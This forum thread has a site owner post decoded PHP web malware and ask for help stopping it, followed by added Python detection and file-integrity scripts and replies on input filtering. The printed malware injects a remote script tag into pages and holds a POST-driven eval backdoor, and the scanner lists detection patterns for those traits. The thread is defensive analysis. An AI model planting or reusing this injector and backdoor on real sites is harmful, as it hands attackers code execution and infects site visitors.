Web Malware Virus Code Decoded

Hello Guys,

Today, web viruses are infecting our websites via:
JS files: <script> tags
HTML files: <script> tags, <iframe> tags, etc.
PHP files: some encoded eval code. Actually, these are the locations where the virus gets executed; the encoded PHP is the virus code, which resides in our own files and spreads to all folders.
I have decoded the virus's encoded string, reversed the virus code and found the actual virus code, but now I need some more support and help to make a proper antivirus, or a way to stop this virus's activity via Apache security or any other way.

Let's see..
This is the virus code, always present in our PHP files.
========
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
======
Now decoded with base64, then I got the virus.. Wowwww

Let's start working on this, guys..... help us to secure the web. The code below is the virus:

<?php
if(!function_exists('gtid1')){
function gtid1($s){
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
foreach($a[0]as $v)
if(count(explode("\n",$v))>5){
$e=preg_match('/#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))
$s=str_replace($v,'',$s);
}
if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))
foreach($a[0]as$v)
if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))
$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);
$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2dhbWVnb2dsZS5jb20vZ2FtZXdyZWNrL2luZGV4Mi5waHAgPjwvc2NyaXB0Pg=='),'',$s);
if(stristr($s,'<body'))
$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);
elseif(strpos($s,'<a'))$s=$a.$s;return$s;
}

function gtid12($a,$b,$c,$d){
global$gtid11;
$s=array();
if(function_exists($gtid11))
call_user_func($gtid11,$a,$b,$c,$d);
foreach(@ob_get_status(1)as$v)
if(($a=$v['name'])=='gtid1')
return;
elseif($a=='ob_gzhandler')
break;
else
$s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){
$s[$i][1]=ob_get_contents();
ob_end_clean();
}
ob_start('gtid1');
for($i=0;$i<count($s);$i++){
ob_start($s[$i][0]);
echo $s[$i][1];
}
}
}
$gtid1l=(($a=@set_error_handler('gtid12'))!='gtid12')?$a:0;eval(base64_decode($_POST['e']));

?>

Please start working on this to stop the virus.
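The decoded sample has a few traits a site owner can scan for: the eval() of base64-decoded POST data at the end (a remote code execution backdoor), the injected <script> tag kept as a base64 literal, the set_error_handler() trick used to install the ob_start() output handler, and the hidden iframes the sample itself hunts for in competing injections. The scanner below is an added example written for this thread, not code from the original post; it keeps the injected tag base64-encoded exactly as it appears in the posted code and decodes it at runtime. The three sample files (INFECTED_SAMPLE, CLEAN_SAMPLE, HTML_SAMPLE) are constructed for the demonstration, and example.invalid is a placeholder host.

```python
import base64
import re

# The injected tag from the decoded sample, kept base64-encoded exactly as it
# appears in the posted code; decoded at runtime rather than retyped.
INJECTED_TAG_B64 = "PHNjcmlwdCBzcmM9aHR0cDovL2dhbWVnb2dsZS5jb20vZ2FtZXdyZWNrL2luZGV4Mi5waHAgPjwvc2NyaXB0Pg=="
INJECTED_TAG = base64.b64decode(INJECTED_TAG_B64).decode("ascii")

# Each indicator: name, severity, compiled regex, and why it matters. These are
# the traits of the decoded sample, not a general malware signature database.
INDICATORS = [
    ("post_eval_backdoor", "high",
     re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I),
     "eval() of base64-decoded request data: a remote code execution backdoor"),
    ("injected_script_tag", "high",
     re.compile(re.escape(INJECTED_TAG) + "|" + re.escape(INJECTED_TAG_B64)),
     "the sample's own injected <script> tag, raw or base64-encoded"),
    ("hidden_iframe", "medium",
     re.compile(r"<iframe\b[^>]*(?:width\s*=\s*['\"]?0+\b|display\s*:\s*none)", re.I),
     "zero-width or display:none iframe, the classic drive-by injection"),
    ("error_handler_hook", "low",
     re.compile(r"set_error_handler\s*\(\s*['\"]\w+['\"]\s*\)", re.I),
     "error handler registration; the sample abuses it to install its ob_start() handler"),
    ("long_base64_literal", "low",
     re.compile(r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{40,}['\"]", re.I),
     "base64_decode() of a long inline literal, how the sample hides its strings"),
]

# Constructed sample: a PHP file carrying the traits of the decoded injector.
# The gtid1() body is shortened; the marker lines are the ones that matter.
INFECTED_SAMPLE = (
    "<?php\n"
    "if(!function_exists('gtid1')){\n"
    "function gtid1($s){ return $s; }  /* body shortened for the example */\n"
    "function gtid12($a,$b,$c,$d){ ob_start('gtid1'); }\n"
    "}\n"
    "$s=str_replace(base64_decode('" + INJECTED_TAG_B64 + "'),'',$s);\n"
    "$gtid1l=(($a=@set_error_handler('gtid12'))!='gtid12')?$a:0;"
    "eval(base64_decode($_POST['e']));\n"
    "?>\n")

# Constructed clean file: user input escaped with htmlentities() before output.
CLEAN_SAMPLE = (
    "<?php\n"
    "$name = htmlentities($_GET['name'] ?? '', ENT_QUOTES, 'UTF-8');\n"
    "echo \"<p>Hello, $name</p>\";\n"
    "?>\n")

# Constructed HTML page with a zero-size iframe injected on line 3.
HTML_SAMPLE = (
    "<html><body>\n"
    "<p>Welcome</p>\n"
    "<iframe src=\"http://example.invalid/x\" width=0 height=0></iframe>\n"
    "</body></html>\n")


def scan_text(text):
    """Return one finding per (indicator, line) for a file's contents."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, severity, pattern, why in INDICATORS:
            if pattern.search(line):
                findings.append({"indicator": name, "severity": severity,
                                 "line": lineno, "why": why,
                                 "snippet": line.strip()[:80]})
    return findings


def scan_file(path):
    """Scan one file on disk; bad bytes are replaced rather than raising."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return scan_text(fh.read())


if __name__ == "__main__":
    for label, text in (("infected.php", INFECTED_SAMPLE),
                        ("clean.php", CLEAN_SAMPLE),
                        ("index.html", HTML_SAMPLE)):
        for f in scan_text(text):
            print(f"{label}:{f['line']} [{f['severity']}] {f['indicator']}: {f['why']}")
```

The low-severity indicators (error handler registration, long base64 literals) appear in legitimate code too, so treat them as context for a high-severity hit rather than as proof on their own; the POST-driven eval() and the sample's own tag are the findings worth acting on. Run scan_file() over every .php, .html and .js file under the web root and review each file that reports a high finding.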

Safeguard your own code...

In reply to: Web Malware Virus Code Decoded

When creating a website, application, etc., remember that ALL data received from outside your own environment may be malicious. That means never execute user-supplied code; immediately filter out/escape prohibited characters (for each respective language, in context) before manipulating, storing, or outputting user-supplied data (PHP-supplied functions, such as htmlentities(), are recommended); etc. Simply patching one exploit today does nothing to prevent a different exploit from being executed tomorrow; there is no substitute for good programming technique.

John

virus writing hardcode into files

In reply to: Safeguard your own code...

Hello John, thanks for the reply.
Yes, it's a better way to escape strings with special characters, but if you look at my post, the virus is executing on our host server and writing code into PHP/HTML/JS files.
That code is encoded with base64.
I have decoded and reviewed it and found that the virus is loaded into memory and uses the output buffer for storing its position.
Even though I have removed all the virus code from the files and given 555 (read and execute) permissions to the files, some time later the virus writes its code into the files again. It's weird how it's writing to a read-only file.
Another thing: if we want to prevent execution of that function, can we look for any .htaccess method that can block a particular function from executing?
Like "gtid1" and "gtid12" could be stopped from executing and removed from the output buffer memory.
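On the "read-only file gets rewritten" point: mode 555 only restricts processes that are not the file's owner. A PHP script running as the same user that owns the files can chmod them back, write, and restore the mode, so the permission bits are not a boundary against code already executing in the web application. What does catch the rewrite is an integrity baseline of content hashes, mode bits and owner, compared at intervals. The script below is an added example for this thread, not code from the original post; the scenario in demo() is constructed in a temporary directory and the appended marker line stands in for the real payload.

```python
import hashlib
import os
import stat
import tempfile


def baseline(root):
    """Record (sha256, mode bits, owner uid) for every regular file under root."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks and special files
            with open(path, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            rel = os.path.relpath(path, root)
            snap[rel] = (digest, stat.S_IMODE(st.st_mode), st.st_uid)
    return snap


def diff_baseline(old, new):
    """Return {relpath: reasons} for files added, missing, or changed in
    content, mode or owner between two baselines."""
    changes = {}
    for rel in sorted(set(old) | set(new)):
        if rel not in old:
            changes[rel] = ["added"]
            continue
        if rel not in new:
            changes[rel] = ["missing"]
            continue
        reasons = [label for label, i in (("content", 0), ("mode", 1), ("owner", 2))
                   if old[rel][i] != new[rel][i]]
        if reasons:
            changes[rel] = reasons
    return changes


def demo():
    """Constructed scenario: a 0555 file is still rewritten by a process that
    runs as its owner, and the baseline comparison reports the change."""
    with tempfile.TemporaryDirectory() as root:
        path = os.path.join(root, "index.php")
        with open(path, "w") as fh:
            fh.write("<?php echo 'clean'; ?>\n")
        os.chmod(path, 0o555)
        before = baseline(root)

        # What the "read-only" mode does not prevent: the owner (this process)
        # flips the write bit, appends, and puts the mode back. A PHP process
        # running as the file owner can do exactly the same.
        os.chmod(path, 0o755)
        with open(path, "a") as fh:
            fh.write("<?php /* constructed marker, not the real payload */ ?>\n")
        os.chmod(path, 0o555)

        after = baseline(root)
        return diff_baseline(before, after)


if __name__ == "__main__":
    for rel, reasons in demo().items():
        print(f"{rel}: {', '.join(reasons)}")
```

In practice, store the baseline outside the web root (or on another host), run the comparison from cron, and treat any "content" or "mode" change on a file you did not deploy as a re-infection to investigate. The durable fix is to stop the writer, not to harden the bits: the files are being written by a process running as their owner, which points at the web application itself or at stolen credentials for that account.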

you are fixing wrong holes

In reply to: virus writing hardcode into files

Sure, you can forbid execution of the "gtid1", "gtid12" and "gtid999" functions, but that will only save you from this particular parasite.

For better protection you should tighten filtration of all incoming data, and also check your FTP password ;) as it might have been stolen already.
